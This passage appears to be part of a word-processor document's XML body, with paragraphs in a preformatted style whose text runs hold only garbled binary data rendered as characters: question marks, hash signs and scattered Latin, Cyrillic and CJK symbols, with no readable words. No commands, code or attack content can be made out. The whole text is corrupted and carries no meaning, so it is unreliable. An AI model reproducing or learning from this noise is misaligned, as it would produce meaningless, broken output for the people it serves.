        <w:t>#s#'??f???#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2???d5'?E}x|??i??????]?%?+???#??~???g?R?Yhf?????N??B??? ~?#???#??#&gt;?5?N"9f??U?b#=?#??</w:t>
        <w:tab/>
        <w:t>j??2[??o@?I##</w:t>
        <w:tab/>
        <w:t>?2?k?U??#?&lt;j_?O?Q_????Zh(?F9L?z~?#9x2????????]&amp;????7?}??=????#???V?B \#=#_?E?|&gt;???n #T#o?#??U)???#U????#?#kV?I#U??1?#???!#?!2T??#?B?}&amp;p?]|&amp;??\??j'#?U(#??#?1q#????g?_?3]Ex?#??iF?#y???#?</w:t>
        <w:br/>
        <w:t>tE?P?{n&lt;?ō?i??x?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">?#???2{#+?@??#??{? </w:t>
        <w:br/>
        <w:t>??U</w:t>
        <w:tab/>
        <w:t>f-z??#!?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????#?#rk?\</w:t>
        <w:tab/>
        <w:t>#&gt;???Z?#??#l?Do???po/|#??Ii?mP?Msz?YnD\h?a?]2??1[?b6x?#|??t#v/9?#?#?6` ?C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?W?w?I???gùv\?kF7?#fQh?U&gt;?#?i]?#w#N??p?#???#"?W??859</w:t>
        <w:tab/>
        <w:t>#h??n_(?#?Zr??'##?#J??%#??q*}?Z?C?~x#bc?J??[U9??&lt;/??6Y?h&amp;:`?^#?%^#x?##?S"(?&gt;?J&lt;?hJ=?;?\?#q??:QOWWxv?`DIo%G???# Y?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?&amp;?R(?S?ND??Y#E|?y&lt;?f???'#)T???@?Q?&gt;?#?(???x??m#?4?&lt;?L#Y#w??h??g????#?#?##}???8???#?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|#~#Y??X??c?S??z?,?#?:?5#?</w:t>
        <w:br/>
        <w:t>##???rF$F??D?9???N???$c?J</w:t>
        <w:tab/>
        <w:t>??|?????5?f?$?*Y#???A#?5?g?~??w?g?~#??!#?#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}?|δ?'??4F??I?a#H?y??U'$?7???b?z#???$!?"???="??45?n]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Q#r,3yBu??#??#??b????#?O??#?(</w:t>
        <w:tab/>
        <w:t>?$??????*?@#??</w:t>
        <w:br/>
        <w:t>?#pE?5?2???3##?+?JY??y?Aaq?##?6?SQ</w:t>
        <w:br/>
        <w:t>*#????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?0F?7?]??-Y##??d??6$#(i??9t5?MQ0C?? #G???dp?[??J#??f???##?#?G??#m??7???h?##?#eK????x??X#?(?##</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>亮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#)4#?3?]a?@;1?#E?sQ?i??H)?AQI??~?a?N??GK[???&lt;?L?_?|#????S?@T???#FF???????2&amp;?0?j?qXw?Y?&amp;B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?o;#?6#?%?!???</w:t>
        <w:tab/>
        <w:t>?!</w:t>
        <w:tab/>
        <w:t>?yt4z????J??3OB?C_q)?bF?jbV?g?'t</w:t>
        <w:tab/>
        <w:t>#Bj??Y#oY?s#?P?]?I?U??fw,Y???@?O)0????#??#G?|?\2i#A???[#O#?I???v???#?1?#Z?r???</w:t>
        <w:tab/>
        <w:t>??1??E??a?N~??????r#??.????8?#???c#??o?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>p?2?TK?(?????#????*Y?#g???N#??˙_(#μ??#?&gt;WH??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????</w:t>
        <w:tab/>
        <w:t>##???П???$?#???j?a&lt;???^?WLJ]?|#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s?#??o?F??????tF)Z???r??|???J??##?,?hj##?????p??#?#?X9?#E</w:t>
        <w:tab/>
        <w:t>@??A#Ц?#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>柕</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>5??#??#_F##E/???F?a4#??</w:t>
        <w:tab/>
        <w:t>#?(?S?W??#V-P?gu?]?kR?#7?z????$?#??X1#???jBuU§?V7??Q?%??h?J???????J????????Q?m#(?%?E###????n$??#j?8*g?#T?\?#&gt;???9?l?#?bF?K?K??]?*BnF##Q???#28?T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}IE????#NC#=!#???'#?g??T?A#?#?0#?#u??gW)#b?N??P?t#;#?#?M?&lt;?-????/Q??B??F?+Z?a?#?A#e#??\?#'??lsmr?;?^&lt;#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>l9`?X\X?#??#?pR?=#S#)h ????k????f??T]51}8&lt;?Y?###B?6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?V36#??E??]3ts???V8??&lt;</w:t>
        <w:br/>
        <w:t>9?I??u?'\t?~x#jS?V#z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?k;/???#23%&lt;?q???Xp?BO[-l??????^{:?p?Zn!#3?{,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oV???###?</w:t>
        <w:tab/>
        <w:t>d???t??':???g:??S)n?t#?47+?#??b#?????/?o???#$?R|[??#?*?s??</w:t>
        <w:tab/>
        <w:t>0:W?#????fk?y?{??j?h&gt;x#z???_?L=1?#?#&amp;/???t'??v,?R#:g%\?p?#???#??YJ??8#5|?+#?#??6</w:t>
        <w:br/>
        <w:t>???#???#?#</w:t>
        <w:tab/>
        <w:t>Xg??#}Z#c?y3???pz?)?~??#2?o?#</w:t>
        <w:br/>
        <w:t>u#OqM#?#?#???Qn{}T&amp;?##??????{?k??#F?</w:t>
        <w:br/>
        <w:t>3?,G#?}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1??^?j???#?/?F??.??.#Y?5#&gt;r?????p?*??d?O##?qo?;?1?#&amp;</w:t>
        <w:tab/>
        <w:t>?????Z?2?!Wsz(?'vz!ěXE??OI#a??~uD;~*!A&amp;d??#N????ǚ#z??ì \w?]?FN??#?#sT?%??#go?f?t?=?'?q????(cZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?????o?im+??:??D?h?&amp;?E??O19#?#?#`??Q\????TCtt???H???"W#??Y+?#A5б??]??U#?}]?VS?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>朁</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#?G?&gt;?#???ām??#????i3?!r0#?#*?'?34#?,Y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a##?!?#?#q?#)??u#'?)?j???R##:CP|?(#???????#??+?I???`?f?T??ZY8m???K?L???#S?b#???????q??#??##?Vz?]#GJ#?8#??##l#sh?&amp;?tS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###???#o\?#G##U???s]?#????w*????'?B???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O??q??##?;D?mq?Rd?ChA#xeC???kR'+#=J2?#???!Jt#?y??{??##?gU???s#?_#??(&gt;????#?a?Lt??#&lt;#?OeA#5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g;UDi???FG#G#???@?@??p?^??b#??????#9?o</w:t>
        <w:tab/>
        <w:t>???y??~z?q?0G?#</w:t>
        <w:tab/>
        <w:t>?t#?+#???K#?h?s?qm?3I#7?9k??#bu??r??#??#?#?G+?</w:t>
        <w:br/>
        <w:t>???##???#???g&amp;N&gt;tq3#@1??0????TK??+#??d#R?U4T??h??}d??W?Lza??#9l###f?&lt;?#??/#H??f???#??Z??RD;##????#P?,e*6?:???#T?,E?I6?D=?(N#?VB????!Q0?)W&gt;?f?т?#??drY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3JZK?????? ?[qei?2?f?&lt;&amp;9(T??V?h'?bυ?#??B#??a?Df???э????-</w:t>
        <w:tab/>
        <w:t>#:)??#^#??????$9???j??6V?#;????#?#{?_!*??##Hm???\??#u0kb????#f?#?4##\,#h#?#;?#???ex#??)????i+???#?#?i??????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?!G?9T#???&gt;Q?z=??:?#?i?????o???#V???#UH?#]???{}??u????n??9??v#?4??@? 4? B?i???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#fq?(##~?##???c???????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*??D ??BSpT??5##}??&amp;#?#HK????#k??:?g??????5#? ??\?????;??hw'v?#s#?UDps?g??#???-?kE"???ja?Rb#=??#j? ???!????M??#N???P#dq??#o??A-???#?5?#!???L?? h?93?#?oq5#?#?E?#?R?n?/5{?s#hA#?uC?%E??????U?G)?*P?????D??#g?-?4BE?;?!~?g?B?s?E}?</w:t>
        <w:tab/>
        <w:t>?#??g#??w????#s?y?|?P?Y;??lV?#e#??#+#WE)m^&lt;|#??@???#h?#???#?pj?&gt;Q?H?_v?@??l??O??8?$#k???#f??P#?-AΘ-?~?+?M?1?R#?]#?0#=???#}?%m+o?k#??t??y#?##???^L#???8??#H1?&gt;???P?????#$'E;{?+$Y?Z?g???-??Z_MmM??_??J?^_?l@R??#??##?#?T?T?Y??#??$tU5????b?F.????N1L).o?t?t#?#</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>M#?n`?#V[?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>屢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?`##?`?h?R?,?#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?x?.ph#C?</w:t>
        <w:br/>
        <w:t>JI??J##??#4?S#??e??</w:t>
        <w:tab/>
        <w:t>?#?C?S~O#IW?%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97#?#?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:;V??&lt;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#?8?#?#??6?Tl??J4??QO?F??E??,??j??)?#1q%?k?E?6?Af(?&lt;#[&lt;V</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>捎</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4?O???\????w?#??#??}??S?'?e#?d?T?</w:t>
        <w:br/>
        <w:t>???}?##]?I????8?#???#?V??,?]U?W?#1?lJ#)E#</w:t>
        <w:tab/>
        <w:t>???q??a?##ZoQ_?#?</w:t>
        <w:br/>
        <w:t>x???Z??]????JO?5&amp;?{?#???IE??I?G??#7x&lt;??*#"?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?##?????k(5#X??????#`!?T?Nwh?#:?m#Ob???yY??F?#????s*?+o?P?\1?&amp;???1??y?B</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>峷</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?{?YF?#??#k0:???3?T#k?X`\???????#??#????</w:t>
        <w:br/>
        <w:t>gtlR0??q</w:t>
        <w:br/>
        <w:t>!#|?$?q??Z+#&lt;8??*#??#7R?d?</w:t>
        <w:tab/>
        <w:t>I?r?LS?#????#?#??</w:t>
        <w:tab/>
        <w:t>?/?h?7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婲</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>T5B?? p?"#a?#??AlWjcu#?i0??O#D4?o?l#?#C?8???lp?P5?Od;??#?Y?M ?'??'2???=?!2??n#???[??5)??$?3?????#?O???C2#?,???9?lt##?Y??&amp;????#*#??6}#??L??&lt;S_j#J??D\##j&lt;$????t??;##?U?#???#?M?A#+Vx?#???i6??h?##BS['????????Ρ????#?M##?t:?u&lt;?i?1?#?~?#?|?:|??P??MJ??V?#?6??/M???##?Y;??#kb?#?j???#?du???Q#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#/?L(6??|#b???;#}+HA?S?R&gt;g4??44?#Lи3=?8?##???u' ?##p???#?%??#????LM??H}??L?I#?3k?y???#???T0E??3%?S????En?#?od55&gt;?##k??A???k???B??P#??uE??`?7zR1qi2?????m?}????#????k?#+I???_??#P?t??h?9R????#???#?.?M=?#&gt;7?p???n#????v#??-?#</w:t>
        <w:tab/>
        <w:t>=???O???2???#^?G#?m?3#Q#?fJ??"E#%#q%d?###?E&amp;??Pr?#???|#???M3?#?#?F?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>x?S]?#Jm?,?GO????&amp;X?#}9fMD_?lkQ_??&amp;N!?</w:t>
        <w:tab/>
        <w:t>?c?;k7_?[?!?Z?</w:t>
        <w:br/>
        <w:t>??#m?L?pS?&lt;?#?#???R?V2\???&gt;?#???#0??F??j?#g?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>罤</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?B7#Vx?)e9L?#!??!?J???,a??#P#G??P?W/u:n?D?'?_?##H?v????_?O#L?????u??x??g?NQ?##-???2???í???#b&amp;??g+?(5?DD?#,? ?'?Q?x#P</w:t>
        <w:br/>
        <w:t>j??s??%ё!aF???a??b?????J@yW????A</w:t>
        <w:tab/>
        <w:t>?A??8?????????F?R?f#KE??????P9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8i???#y4?#?#??#Z\??\e???\??[|??#?k???`?m?#7?D#??</w:t>
        <w:tab/>
        <w:t>#??????v?'#e#?S=?#?&gt;?@??#</w:t>
        <w:tab/>
        <w:t>??r:??????#?q#?#</w:t>
        <w:tab/>
        <w:t>a#E}???7{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Hg?UC#7?h[z&gt;?7????????/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xwl?ì</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##?X1??x??#??#!?xf?;??*0?6T&gt;???#???c??=?c.I?????,#h??7&lt;?#R??x#????pH???#/##?#Q?z??]*oz?t#?"???#??cK&gt;##</w:t>
        <w:tab/>
        <w:t>#?Q?7?H?##M???Xe8$?V???##9?O???T???#?#qe?????'m?n?{V#?^iD#?????@ ?#Q?V????#??#?C????#Woc</w:t>
        <w:tab/>
        <w:t>O?R?O??0U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9?p??#O&gt;??##???~???T??ih?)??#wl?U?}#?</w:t>
        <w:br/>
        <w:t>?@??S?M?y?N]?b???''??;?#?#gz?l??##?tn???qp?LeJ????C#:? ??0??#_QWx #V#?r#???]?x?#[&gt;Y?@zR???F~X)??]?x\???-#?)&gt;?</w:t>
        <w:br/>
        <w:br/>
        <w:t>a#X?n?s#r???]??3m?^#??b??#???G?[lZ?D?+??9&gt;-??#?g#)i??</w:t>
        <w:br/>
        <w:t>?sP?`+0+~?-i#?v~#6;\u*?^???#L5h?&amp;?l&lt;m?3?0?##mX?D?Ze?#??#?~v:z??=???aFS??b?#? ?N]R2 G1??m#?:L?e~?:]?+?2#5?#???r?`=7????s</w:t>
        <w:br/>
        <w:t>??????s?#?????T??d??B?WH##1??&gt;?&lt;I#?(#?</w:t>
        <w:tab/>
        <w:t>?#??#??rh?U7?#?,6???@??B?#?#????g???????.E????F#??[?s9EH????+pA##!!l&gt;?z??r?&amp;6a??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>C4??9?*#?+?:-??E3P4'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-?|D?pzzU?????^7?W#f&amp;?5#?b&lt;!M(???#?_#?_?c??#]2k??F?#??#?|?l??UI#??^|#??9????'?i????#?q??U???(#?%?????P???1???F##??Kt?K?t#??Y?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'? '?#?o#???MD!$9?uP?u?&lt;??@##D???_?#j??'#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砄</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#??#:#S?Z2s?-?#"#B?~?h?#^??P????0Oi?????r??i?&lt;1l??g#i??#M??#?E^q??#?R#?p???)????#I?{?#???-u??? 3#?#?i??|????q??!?h?SA#ta??,???NgcH#V</w:t>
        <w:tab/>
        <w:t>?p?|#/?u??Z?o#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>y??????/??8k?8#W???#?:d#??P#{?)##p?#?D?t#}???#-S?$?`#?#?##_?#????*#U#:'?D#j?#?</w:t>
        <w:tab/>
        <w:t>?])?#Q?4##????#?? w??c?=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#??Kt?j??cW7#??#[?????#??#?&lt;5F????v?#?J?#i?=?!?#U&gt;?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?3?#?i#g##-??#-l&gt;???##??A2???;?X??_??##??rp?#?K#?57??C#?#f#b-E?^.?????x.(????|?ReQ?#?#E"P]6?ur?$#cyQOFGc#?{#??0?d???9)lGa[5R???_?i??L!??Ay~?/??^#?h?ia'??#?u?6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%#?k??{?v##?2???#$?#X??r?Dx++?Wa}???K,?*???#??2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>疇</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>QhD?C??d??#?H#/???i#?E</w:t>
        <w:tab/>
        <w:t>#??my?N5?l??c#??????|?##3%?????aq??6?????#?P#$?y~?#??</w:t>
        <w:br/>
        <w:t>O_.?!E?_Uo5?k?)ie?_Hi#?"???T7"??[4? (????3U0Z?rY???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/w???#^IC??V???F?nf?#iN?1L#W#"?Q?CZ??A?&lt;?p?qX???4?K?#`?#???????v</w:t>
        <w:br/>
        <w:t>??A?eS^?#,?#W"#6??vA?#?g?#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  <w:br/>
        <w:t>?X?????Hv?6B??)q?.&lt;?O?&amp;?#*?n?j??~&amp;?a#3?????+Ul?2??I#8%????f2??#????</w:t>
        <w:br/>
        <w:t>gRM?p6e?&amp;??#?,=?#[#?k?k,#j?b##???#!#??_@?s?Q@}?"?#V##d?hM7??G?(#f#?f?r?&gt;d?Y?#?;eV???Gm?I?j?A?#P5E?????)??N??????.##-?#|?O?h?z?%}/GS?#]K\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??c{????m?F?t?#?d.T?R)</w:t>
        <w:br/>
        <w:t>#&gt;?T?n#u?u?B??#?</w:t>
        <w:br/>
        <w:t>??????#Me???,?aP??(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FV?#P</w:t>
        <w:tab/>
        <w:t>6??????#</w:t>
        <w:br/>
        <w:t>+Q??LT??#хr?"???.u#e#7q&gt;Xa}?#~kR?^F??????bz?M??#??eG??;?q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fX,?&lt;~X???z???i#?#V?</w:t>
        <w:br/>
        <w:t>#Zh#8FL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?H??R??μ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##zsU??nD??*??XG?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#VR??~n}e??#?`????5???S?#5#??##}</w:t>
        <w:br/>
        <w:t>I#??j?!?]$*??E????D???C??#?_?5??6J"#?wB#,??#?</w:t>
        <w:tab/>
        <w:t>v(?#P?8?z#sDk??K,??NM8=?#E4?##`-`?#?#</w:t>
        <w:tab/>
        <w:t>m~???w#?fb#??R??A??????ig???#L???#,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>|???,C#?a?9???A##?M3!#??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6|$?5?;?P??#??O&amp;?Y:~?FHO#D??B?*[qo?y#EY&gt;?^?#}g??-?q</w:t>
        <w:tab/>
        <w:t>#d:@e9?Z?5?h??Eh#??=a#P#?r?#j?J4??Z#?pF/'bq??o??w;???&amp;#Wj\???ep?F??H??q?8#{?zH#???\#Ck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V%?#x#?#??? ?#d??##uQ???#??G#p??:#d#?'gX?:?#j?nm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?#??????nTg4?</w:t>
        <w:br/>
        <w:t>?????ir^Q?\UH?,???p?0W?p?K$?|??,R???#t?7?_:iU?Om?f#??##??A3#O?z?c?)(^#I?#Q#???#?t??v{?9?#???h#???k??Cf-\??[O??@?&gt;\I??iK#?+??,#'x.?n?r??2EV?#3\?,%HZ?oK#g??#??#????SZD?f#?JQ??`</w:t>
        <w:br/>
        <w:t>U?R?7?##??#E#'z?#_C.?|??D?OY?:?????????[??????V;Z?EVBC##?Jc?#:|?.???#??B?#???+?=??L?</w:t>
        <w:br/>
        <w:t>?#??i?#??Y&gt;?#?#&gt;?????l?#?Xy?7?e?#??f%?C?</w:t>
        <w:tab/>
        <w:t>?8?EB?R?P?5l??J#???^^?#??!???Hh??p?</w:t>
        <w:br/>
        <w:t>gh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?B??????;?#y???h$??/6???2??|!??og?v?#s?F#o?#.MGAD*???</w:t>
        <w:tab/>
        <w:t>s?{?3K?u??,o???W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j]??(i#???,??'#?rRg?)?#??!?#?9??y?:?)_</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?4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?Z#??^?'Sf?##&amp;?</w:t>
        <w:tab/>
        <w:t>?TW??A?????????Z|???/?#u0?;????##?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#???)r??9???#%????E.?m:???&amp;#T?{-xm|L?##</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>羬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???Fx#?c?#&amp;?4#^?{!u????i1?h????6#??'??4?????'??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&amp;???\]???d#??.#I??#?u???JHt?M%A??$2?*?#??M6?e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V??##l/p?=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n??# ???</w:t>
        <w:tab/>
        <w:t>nU?-?=#igR&lt;\?</w:t>
        <w:tab/>
        <w:t>??R?</w:t>
        <w:br/>
        <w:t>???$?d:???`?6eT?_??yB!F?#??|Z?g##??*b?q;##?NV??3?Yun#???W??/?)#?}U???W??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>鍶</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>*(?????5??#&gt;|#?#?????j#]??I??c??#O??G`#?#l)*?????M????T#y#????/?K????w#?#J?I ???</w:t>
        <w:tab/>
        <w:t>??O?????V+?#T7??rE^?A??j##??C:??&gt;?!?@G?AJ#B????????N???R??#~ǖ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[???.#?#?5??O"?##??8???x?N!?(#4ù#z#??#?#K??n?|5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???~?#`?#????%_NS??/-dY? ?9]????P?}?H???W?V??&gt;FZ??vt#0#D???7%6?0E#5??#?,?2?i#H?#EX#?#?L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;,)be?T?i??#:??C???#?".#??t#????^??#????#-^4#?w??????y?j?n?L(H????M?u?Y?l?#?#?\M?#????\?#??*E?(??Lt#</w:t>
        <w:tab/>
        <w:t>!??5##C?.Kd##?u?*?#??C?{V#?w\??]OCc.l??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>蟬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>x#9#:#~r?#??#}P?6??5#?##??M??#l#;PH85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*#'Z??!4c??????|P?J?S#???? ?У&amp;???E"???=?]3??UG]?#?#){?L??|2???#??_??#?;K9??#qT????#?O?T)?&lt;e?##@=X?O?'#?T?,?qD#)1?G#eO*??6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???2#??bD???y??'?d?#???L:-~????N:?(c?S??F#?5??#?l???G#gn&amp;??`{J????&amp;???l???ж=H?#7d??2#h?C?S$?yI{??x?D??#??D,?l??#y?##??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??|???*eo?????0#T??w?Δ?????x?H</w:t>
        <w:br/>
        <w:t>/%?z???#2SA?4?F,</w:t>
        <w:br/>
        <w:t>?$??KQ??1?3???3?#</w:t>
        <w:br/>
        <w:t>(?:I-;?a#??B?2*s??/#?p#?d?r3Jo#?q?27???V?</w:t>
        <w:br/>
        <w:t>xk???K??u?C??#p?L-?*?c??@???&amp;e#]??#^u??gY????,~fJR??[?m ]e</w:t>
        <w:br/>
        <w:t>w???#Gl?#B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8U!g???#?5#</w:t>
        <w:br/>
        <w:t>}?m??&gt;)??#??#x?????#???]??V??d#????#g?u?V?6?a?#?6?v#?b?[Q?w?*???#??x??gUR??w#</w:t>
        <w:tab/>
        <w:t>?????|??????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>傖</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?*"?l#?X?g???\?hf3d?}???&lt;#?#?W?a??????#&lt;?`?#kI?&lt;???N*?]#jY^</w:t>
        <w:tab/>
        <w:t>??+?q##?P?</w:t>
        <w:br/>
        <w:t>M#@T?M#?.g#84lP??j????h6#c?#?N???????x?}a###ha?????#vGU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M?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
